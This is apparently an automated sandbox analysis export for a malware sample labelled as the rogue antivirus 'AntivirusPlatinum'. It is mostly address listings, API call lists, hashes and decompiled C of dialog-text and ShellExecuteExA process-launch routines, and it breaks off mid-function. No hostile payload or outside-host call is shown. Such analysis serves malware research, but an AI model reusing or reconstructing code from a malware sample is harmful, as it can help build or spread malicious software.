                                                                                                                                                  0x004043f7
                                                                                                                                                  0x004043fd
                                                                                                                                                  0x00404401
                                                                                                                                                  0x00404407
                                                                                                                                                  0x0040440d
                                                                                                                                                  0x00404413
                                                                                                                                                  0x00404419
                                                                                                                                                  0x00404422
                                                                                                                                                  0x0040442a
                                                                                                                                                  0x00404430
                                                                                                                                                  0x00404437
                                                                                                                                                  0x00404439
                                                                                                                                                  0x0040443b
                                                                                                                                                  0x0040443b
                                                                                                                                                  0x00404442
                                                                                                                                                  0x00404449
                                                                                                                                                  0x0040445b
                                                                                                                                                  0x00404473
                                                                                                                                                  0x0040447e
                                                                                                                                                  0x00404487
                                                                                                                                                  0x00404495
                                                                                                                                                  0x0040449a
                                                                                                                                                  0x004044a0
                                                                                                                                                  0x004044a3
                                                                                                                                                  0x004044a6
                                                                                                                                                  0x004044a8
                                                                                                                                                  0x0040451b
                                                                                                                                                  0x00404525
                                                                                                                                                  0x0040452c
                                                                                                                                                  0x00404532
                                                                                                                                                  0x0040453e
                                                                                                                                                  0x0040453e
                                                                                                                                                  0x00404542
                                                                                                                                                  0x00404542
                                                                                                                                                  0x0040454b
                                                                                                                                                  0x0040454c
                                                                                                                                                  0x00404552
                                                                                                                                                  0x00404553
                                                                                                                                                  0x00404554
                                                                                                                                                  0x00404559
                                                                                                                                                  0x0040455b
                                                                                                                                                  0x00404568
                                                                                                                                                  0x0040456f
                                                                                                                                                  0x00404571
                                                                                                                                                  0x00404578
                                                                                                                                                  0x00404591
                                                                                                                                                  0x0040459d
                                                                                                                                                  0x004045a9
                                                                                                                                                  0x004045af
                                                                                                                                                  0x004045c5
                                                                                                                                                  0x004045d3
                                                                                                                                                  0x0040457a
                                                                                                                                                  0x0040458a
                                                                                                                                                  0x0040458a
                                                                                                                                                  0x00404578
                                                                                                                                                  0x0040455d
                                                                                                                                                  0x00404560
                                                                                                                                                  0x00404560
                                                                                                                                                  0x004045d8
                                                                                                                                                  0x004045dc
                                                                                                                                                  0x004045e0
                                                                                                                                                  0x004045e0
                                                                                                                                                  0x004045e5
                                                                                                                                                  0x004045e9
                                                                                                                                                  0x004045ed
                                                                                                                                                  0x00404658
                                                                                                                                                  0x00404658
                                                                                                                                                  0x0040465c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404662
                                                                                                                                                  0x00404666
                                                                                                                                                  0x00404672
                                                                                                                                                  0x00404672
                                                                                                                                                  0x00404678
                                                                                                                                                  0x0040467d
                                                                                                                                                  0x0040467f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404685
                                                                                                                                                  0x0040468b
                                                                                                                                                  0x0040468d
                                                                                                                                                  0x0040468d
                                                                                                                                                  0x0040468d
                                                                                                                                                  0x0040468d
                                                                                                                                                  0x00404694
                                                                                                                                                  0x00404698
                                                                                                                                                  0x004046b2
                                                                                                                                                  0x004046ba
                                                                                                                                                  0x004046cc
                                                                                                                                                  0x004046e6
                                                                                                                                                  0x004046f1
                                                                                                                                                  0x004046fc
                                                                                                                                                  0x00404709
                                                                                                                                                  0x0040471c
                                                                                                                                                  0x0040472d
                                                                                                                                                  0x00404732
                                                                                                                                                  0x00404739
                                                                                                                                                  0x0040474f
                                                                                                                                                  0x0040474f
                                                                                                                                                  0x00404754
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040469a
                                                                                                                                                  0x0040469a
                                                                                                                                                  0x004046a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004046ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004046ad
                                                                                                                                                  0x00404698
                                                                                                                                                  0x00404668
                                                                                                                                                  0x0040466c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004045ef
                                                                                                                                                  0x004045ef
                                                                                                                                                  0x004045f5
                                                                                                                                                  0x004045f7
                                                                                                                                                  0x0040460b
                                                                                                                                                  0x00404613
                                                                                                                                                  0x00404619
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040461b
                                                                                                                                                  0x0040461b
                                                                                                                                                  0x00404628
                                                                                                                                                  0x00404629
                                                                                                                                                  0x0040462f
                                                                                                                                                  0x0040462b
                                                                                                                                                  0x0040462b
                                                                                                                                                  0x0040462b
                                                                                                                                                  0x00404631
                                                                                                                                                  0x0040463a
                                                                                                                                                  0x0040463b
                                                                                                                                                  0x0040464a
                                                                                                                                                  0x00404653
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404653
                                                                                                                                                  0x004045ff
                                                                                                                                                  0x00404605
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404607
                                                                                                                                                  0x00404609
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404609
                                                                                                                                                  0x004045ed
                                                                                                                                                  0x00404534
                                                                                                                                                  0x00404538
                                                                                                                                                  0x0040453c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044aa
                                                                                                                                                  0x004044aa
                                                                                                                                                  0x004044b0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044b2
                                                                                                                                                  0x004044be
                                                                                                                                                  0x004044c8
                                                                                                                                                  0x004044cb
                                                                                                                                                  0x004044cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044cf
                                                                                                                                                  0x004044d9
                                                                                                                                                  0x004044d9
                                                                                                                                                  0x004044db
                                                                                                                                                  0x00404504
                                                                                                                                                  0x00404516
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404516
                                                                                                                                                  0x004044dd
                                                                                                                                                  0x004044eb
                                                                                                                                                  0x004044ed
                                                                                                                                                  0x004044f2
                                                                                                                                                  0x004044f8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044fc
                                                                                                                                                  0x00404502
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404502
                                                                                                                                                  0x004044df
                                                                                                                                                  0x004044e9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044e9
                                                                                                                                                  0x004044d1
                                                                                                                                                  0x004044d7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004044d7
                                                                                                                                                  0x004044a8
                                                                                                                                                  0x0040436b
                                                                                                                                                  0x0040436d
                                                                                                                                                  0x0040436f
                                                                                                                                                  0x0040437f
                                                                                                                                                  0x00404383
                                                                                                                                                  0x00404387
                                                                                                                                                  0x0040438b
                                                                                                                                                  0x00404390
                                                                                                                                                  0x00404392
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404394
                                                                                                                                                  0x0040420b
                                                                                                                                                  0x00404211
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404216
                                                                                                                                                  0x0040425b
                                                                                                                                                  0x0040425d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040428d
                                                                                                                                                  0x00404292
                                                                                                                                                  0x00404294
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040429a
                                                                                                                                                  0x0040429d
                                                                                                                                                  0x004042a0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004042b2
                                                                                                                                                  0x004042b9
                                                                                                                                                  0x004042be
                                                                                                                                                  0x004042c6
                                                                                                                                                  0x004042cb
                                                                                                                                                  0x004042cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004042dd
                                                                                                                                                  0x004042e1
                                                                                                                                                  0x004042e2
                                                                                                                                                  0x004042f8
                                                                                                                                                  0x00404302
                                                                                                                                                  0x0040430e
                                                                                                                                                  0x0040433c
                                                                                                                                                  0x00404341
                                                                                                                                                  0x00404343
                                                                                                                                                  0x00404352
                                                                                                                                                  0x00404357
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404357
                                                                                                                                                  0x00404345
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404247
                                                                                                                                                  0x00404247
                                                                                                                                                  0x0040424b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040424b
                                                                                                                                                  0x00404245
                                                                                                                                                  0x00404072
                                                                                                                                                  0x00404076
                                                                                                                                                  0x0040421d
                                                                                                                                                  0x00404223
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404223
                                                                                                                                                  0x0040407c
                                                                                                                                                  0x00404080
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404086
                                                                                                                                                  0x0040408a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404090
                                                                                                                                                  0x00404097
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040409d
                                                                                                                                                  0x004040a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004040a7
                                                                                                                                                  0x004040ad
                                                                                                                                                  0x004040b4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004040ba
                                                                                                                                                  0x004040d9
                                                                                                                                                  0x004040db
                                                                                                                                                  0x00404186
                                                                                                                                                  0x00404186
                                                                                                                                                  0x004041bc
                                                                                                                                                  0x004041bc
                                                                                                                                                  0x004041c3
                                                                                                                                                  0x004041cd
                                                                                                                                                  0x004041e0
                                                                                                                                                  0x004041f9
                                                                                                                                                  0x004041fb
                                                                                                                                                  0x00404204
                                                                                                                                                  0x00404204
                                                                                                                                                  0x00404209
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404209
                                                                                                                                                  0x004040e7
                                                                                                                                                  0x004040ec
                                                                                                                                                  0x004040ef
                                                                                                                                                  0x004040f1
                                                                                                                                                  0x004040ff
                                                                                                                                                  0x00404104
                                                                                                                                                  0x00404106
                                                                                                                                                  0x0040412d
                                                                                                                                                  0x00404132
                                                                                                                                                  0x00404132
                                                                                                                                                  0x00404106
                                                                                                                                                  0x0040413e
                                                                                                                                                  0x00404143
                                                                                                                                                  0x0040415d
                                                                                                                                                  0x00404162
                                                                                                                                                  0x00404164
                                                                                                                                                  0x00404166
                                                                                                                                                  0x0040416a
                                                                                                                                                  0x004041ab
                                                                                                                                                  0x004041b7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004041b7
                                                                                                                                                  0x0040416c
                                                                                                                                                  0x00404173
                                                                                                                                                  0x00404181
                                                                                                                                                  0x00404181
                                                                                                                                                  0x00404173
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404164
                                                                                                                                                  0x0040405d
                                                                                                                                                  0x00403fdd
                                                                                                                                                  0x00403fdd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403fdd
                                                                                                                                                  0x00403fb2
                                                                                                                                                  0x00403fb7
                                                                                                                                                  0x00403fb9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403fbb
                                                                                                                                                  0x00403fc2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403fd0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403fd0
                                                                                                                                                  0x00403f7c
                                                                                                                                                  0x00403f80
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f80
                                                                                                                                                  0x00403f6d
                                                                                                                                                  0x00403f74
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f74
                                                                                                                                                  0x00403f53
                                                                                                                                                  0x00403f5a
                                                                                                                                                  0x00403f5e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f5e
                                                                                                                                                  0x00403ea5
                                                                                                                                                  0x00403eab
                                                                                                                                                  0x00403eaf
                                                                                                                                                  0x00403ed3
                                                                                                                                                  0x00403eb1
                                                                                                                                                  0x00403eb9
                                                                                                                                                  0x00403eb9
                                                                                                                                                  0x00403ed8
                                                                                                                                                  0x00403edc
                                                                                                                                                  0x00403ede
                                                                                                                                                  0x00403ee0
                                                                                                                                                  0x00403ee0
                                                                                                                                                  0x00403ee7
                                                                                                                                                  0x00403eeb
                                                                                                                                                  0x00403efe
                                                                                                                                                  0x00403f05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403eed
                                                                                                                                                  0x00403eed
                                                                                                                                                  0x00403ef4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403ef6
                                                                                                                                                  0x00403f0a
                                                                                                                                                  0x00403f12
                                                                                                                                                  0x00403f17
                                                                                                                                                  0x00403f1b
                                                                                                                                                  0x00403f1d
                                                                                                                                                  0x00403f25
                                                                                                                                                  0x00403f2f
                                                                                                                                                  0x00403f34
                                                                                                                                                  0x00403f36
                                                                                                                                                  0x00403f3a
                                                                                                                                                  0x00403f3b
                                                                                                                                                  0x00403f3b
                                                                                                                                                  0x00403f36
                                                                                                                                                  0x00403f25
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403f1b
                                                                                                                                                  0x00403eeb
                                                                                                                                                  0x00403e30
                                                                                                                                                  0x00403e37
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403e39
                                                                                                                                                  0x00403e39
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403e39
                                                                                                                                                  0x00403e37
                                                                                                                                                  0x00403e0f
                                                                                                                                                  0x00403e13
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403e17
                                                                                                                                                  0x00403e1c
                                                                                                                                                  0x00403e1e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403e20
                                                                                                                                                  0x00403e23
                                                                                                                                                  0x00403e27
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403e27
                                                                                                                                                  0x00403e1e
                                                                                                                                                  0x00403da3
                                                                                                                                                  0x00403da9
                                                                                                                                                  0x00403dac
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403dbd
                                                                                                                                                  0x00403dc2
                                                                                                                                                  0x00403dc4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403dc6
                                                                                                                                                  0x00403dc6
                                                                                                                                                  0x00403dc8
                                                                                                                                                  0x00403ddd
                                                                                                                                                  0x00403de4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403de4
                                                                                                                                                  0x00403dc4
                                                                                                                                                  0x00403d58
                                                                                                                                                  0x00403d5e
                                                                                                                                                  0x00403d61
                                                                                                                                                  0x00403d63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403d63
                                                                                                                                                  0x00403cf8
                                                                                                                                                  0x00403cff
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403d01
                                                                                                                                                  0x00403d01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403d01
                                                                                                                                                  0x00403c9e
                                                                                                                                                  0x00403ca4
                                                                                                                                                  0x00403ca7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403ca9
                                                                                                                                                  0x00403cad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403caf
                                                                                                                                                  0x00403caf
                                                                                                                                                  0x00403cb1
                                                                                                                                                  0x00403cb3
                                                                                                                                                  0x00403cb3
                                                                                                                                                  0x00403cc6
                                                                                                                                                  0x00403cd2
                                                                                                                                                  0x00403cd4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403cd6
                                                                                                                                                  0x00403ce6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403ce6
                                                                                                                                                  0x00403cd4
                                                                                                                                                  0x00403cad
                                                                                                                                                  0x00403bf8
                                                                                                                                                  0x00403bfd
                                                                                                                                                  0x00403c01
                                                                                                                                                  0x00403c03
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403c03
                                                                                                                                                  0x00403b73
                                                                                                                                                  0x00403b7f
                                                                                                                                                  0x00403b82
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b84
                                                                                                                                                  0x00403b8b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b8b
                                                                                                                                                  0x00403aa5
                                                                                                                                                  0x00403aa8
                                                                                                                                                  0x00403aaf
                                                                                                                                                  0x00403aaf
                                                                                                                                                  0x00403ab6
                                                                                                                                                  0x00403ab6
                                                                                                                                                  0x00403ab9
                                                                                                                                                  0x00403b01
                                                                                                                                                  0x00403b01
                                                                                                                                                  0x00403b04
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b06
                                                                                                                                                  0x00403b0d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b1d
                                                                                                                                                  0x00403b22
                                                                                                                                                  0x00403b24
                                                                                                                                                  0x00403a7b
                                                                                                                                                  0x00403a82
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b2a
                                                                                                                                                  0x00403b2c
                                                                                                                                                  0x00403b41
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403b41
                                                                                                                                                  0x00403abb
                                                                                                                                                  0x00403ac7
                                                                                                                                                  0x00403acc
                                                                                                                                                  0x00403ace
                                                                                                                                                  0x00403ad0
                                                                                                                                                  0x00403ad0
                                                                                                                                                  0x00403ad7
                                                                                                                                                  0x00403ade
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403ae0
                                                                                                                                                  0x00403aeb
                                                                                                                                                  0x00403aed
                                                                                                                                                  0x00403af9
                                                                                                                                                  0x00403afe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403afe
                                                                                                                                                  0x00403ade
                                                                                                                                                  0x00403ab9
                                                                                                                                                  0x00403aaa
                                                                                                                                                  0x00403aad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403aad
                                                                                                                                                  0x00403a62
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403a79
                                                                                                                                                  0x00403a8c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403a8c
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char
                                                                                                                                                  • String ID: E$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA$|LA
                                                                                                                                                  • API String ID: 751630497-346517416
                                                                                                                                                  • Opcode ID: eee26958c6a56c2cea3dea3588ea9456c765e8deb1b2562b0ca7647085e02320
                                                                                                                                                  • Instruction ID: 3a254fb49c50d1bdf513d271921d20743245357351c521a06279862033cd8a45
                                                                                                                                                  • Opcode Fuzzy Hash: eee26958c6a56c2cea3dea3588ea9456c765e8deb1b2562b0ca7647085e02320
                                                                                                                                                  • Instruction Fuzzy Hash: 298238B0904684ADDF25DF70C844BEBBBA9AF01304F0441BBFA99761C2D77D6A84CB59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040AD46(char _a4, long _a8) {
                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                  				char _v43;
                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                  				signed int _v60;
                                                                                                                                                  				int _v64;
                                                                                                                                                  				void* _v68;
                                                                                                                                                  				intOrPtr _t48;
                                                                                                                                                  				struct HWND__* _t49;
                                                                                                                                                  
                                                                                                                                                  				_t49 = GetDlgItem( *0x419f80, 0x67);
                                                                                                                                                  				_v8 = _t49;
                                                                                                                                                  				if( *0x41a814 == 0) {
                                                                                                                                                  					_t48 =  *0x418ecc; // 0x0
                                                                                                                                                  					E0040649C(_t48);
                                                                                                                                                  					ShowWindow(_t49, 5); // executed
                                                                                                                                                  					SendMessageA(_t49, 0xb1, 0, 0xffffffff);
                                                                                                                                                  					SendMessageA(_t49, 0xc2, 0, 0x41259a);
                                                                                                                                                  					 *0x41a814 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                  				_v68 = 0x3c;
                                                                                                                                                  				SendMessageA(_v8, 0x43a, 0,  &_v68);
                                                                                                                                                  				_v43 = 0;
                                                                                                                                                  				_v64 = 1;
                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                  					_v60 = _v60 & 0xbfffffff | 1;
                                                                                                                                                  					_v48 = 0xa0;
                                                                                                                                                  					_v64 = 0x40000001;
                                                                                                                                                  				}
                                                                                                                                                  				SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                  				SendMessageA(_v8, 0xc2, 0, _a8);
                                                                                                                                                  				SendMessageA(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                  					_v60 = _v60 & 0xfffffffe | 0x40000000;
                                                                                                                                                  					SendMessageA(_v8, 0x444, 1,  &_v68);
                                                                                                                                                  				}
                                                                                                                                                  				return SendMessageA(_v8, 0xc2, 0, "\r\n");
                                                                                                                                                  			}











                                                                                                                                                  0x0040ad6a
                                                                                                                                                  0x0040ad6c
                                                                                                                                                  0x0040ad74
                                                                                                                                                  0x0040ad76
                                                                                                                                                  0x0040ad7c
                                                                                                                                                  0x0040ad84
                                                                                                                                                  0x0040ad90
                                                                                                                                                  0x0040ad9f
                                                                                                                                                  0x0040ada1
                                                                                                                                                  0x0040ada1
                                                                                                                                                  0x0040adb3
                                                                                                                                                  0x0040adc3
                                                                                                                                                  0x0040adca
                                                                                                                                                  0x0040add3
                                                                                                                                                  0x0040add7
                                                                                                                                                  0x0040adda
                                                                                                                                                  0x0040ade7
                                                                                                                                                  0x0040adea
                                                                                                                                                  0x0040adf1
                                                                                                                                                  0x0040adf1
                                                                                                                                                  0x0040ae05
                                                                                                                                                  0x0040ae14
                                                                                                                                                  0x0040ae1c
                                                                                                                                                  0x0040ae22
                                                                                                                                                  0x0040ae2f
                                                                                                                                                  0x0040ae40
                                                                                                                                                  0x0040ae40
                                                                                                                                                  0x0040ae57

                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040AD57
                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE8F), ref: 0040AD84
                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040AD90
                                                                                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,0041259A), ref: 0040AD9F
                                                                                                                                                  • SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040ADB3
                                                                                                                                                  • SendMessageA.USER32(?,0000043A,00000000,?), ref: 0040ADCA
                                                                                                                                                  • SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE05
                                                                                                                                                  • SendMessageA.USER32(?,000000C2,00000000,0040AE8F), ref: 0040AE14
                                                                                                                                                  • SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040AE1C
                                                                                                                                                  • SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE40
                                                                                                                                                  • SendMessageA.USER32(?,000000C2,00000000,004125D0), ref: 0040AE51
                                                                                                                                                    • Part of subcall function 0040649C: DestroyWindow.USER32(?,762CB980,0040AD81), ref: 004064A7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$DestroyItemShow
                                                                                                                                                  • String ID: <
                                                                                                                                                  • API String ID: 2996232536-4251816714
                                                                                                                                                  • Opcode ID: b546c9a217eaf8668518a41a4175dc85f1f87bc0d83f6ce22c4a9e4b0cc0ba0d
                                                                                                                                                  • Instruction ID: 084cac9118b8bafa9f7e2012358cdd00eacd402f5ccca60df93bcffea555cbd4
                                                                                                                                                  • Opcode Fuzzy Hash: b546c9a217eaf8668518a41a4175dc85f1f87bc0d83f6ce22c4a9e4b0cc0ba0d
                                                                                                                                                  • Instruction Fuzzy Hash: 1F318071E40218BAEB119BA4DC4AFEE7F79EB81754F148129F201BA1E0C7B51E10DB69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 768 40bd80-40bd97 call 40a384 771 40bf94-40bf96 768->771 772 40bd9d-40bdbe call 40a289 768->772 775 40bdc0-40bdc6 772->775 776 40bdc8 772->776 777 40bdcb-40bdcf 775->777 776->777 778 40be10-40be13 777->778 779 40bdd1 777->779 780 40be24-40be38 call 407690 778->780 781 40be15-40be1b 778->781 782 40bdd3-40bdd6 779->782 793 40be50-40be5e call 405767 780->793 794 40be3a-40be47 call 40a59a 780->794 781->780 783 40be1d 781->783 785 40bdd8 782->785 786 40bdec-40bdf0 782->786 783->780 788 40bde0-40bde4 785->788 789 40bdf2-40bdf7 786->789 790 40be03-40be08 786->790 795 40bde6 788->795 796 40bdda-40bdde 788->796 789->790 797 40bdf9-40bdff 789->797 791 40be0a 790->791 792 40be0c-40be0d 790->792 791->792 792->778 804 40be60-40be75 call 405822 793->804 805 40be78-40be7b 793->805 794->793 806 40be49 794->806 795->786 796->788 798 40bde8 796->798 797->782 801 40be01 797->801 798->786 801->778 804->805 808 40beb7-40beca ShellExecuteExA 805->808 809 40be7d-40be80 805->809 806->793 812 40bee9-40bef8 808->812 813 40becc-40bee3 ShellExecuteExA 808->813 809->808 811 40be82-40beb1 call 40a477 call 40a5e2 call 405767 809->811 811->808 815 40bf92-40bf93 811->815 816 40befa-40befd 812->816 817 40beff-40bf06 812->817 813->812 813->815 815->771 816->817 818 40bf36-40bf42 CloseHandle 816->818 819 40bf20-40bf31 WaitForInputIdle call 40b6ea 817->819 820 40bf08-40bf11 IsWindowVisible 817->820 824 40bf44-40bf53 call 40a59a 818->824 825 40bf55-40bf5b 818->825 819->818 820->819 822 40bf13-40bf1c ShowWindow 820->822 822->819 824->825 835 40bf83-40bf86 824->835 829 40bf69-40bf7c 825->829 830 40bf5d-40bf60 825->830 834 40bf7d Sleep 829->834 830->829 833 40bf62-40bf67 830->833 833->834 834->835 835->815 837 40bf88-40bf90 ShowWindow 835->837 837->815
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040BD80(char* __eax, void* __ecx, long _a4) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				struct _SHELLEXECUTEINFOA _v72;
                                                                                                                                                  				char _v1096;
                                                                                                                                                  				char _v2120;
                                                                                                                                                  				void* _t56;
                                                                                                                                                  				void* _t59;
                                                                                                                                                  				intOrPtr _t60;
                                                                                                                                                  				char _t61;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				struct HWND__* _t65;
                                                                                                                                                  				long _t68;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				char* _t86;
                                                                                                                                                  				long _t87;
                                                                                                                                                  				char _t93;
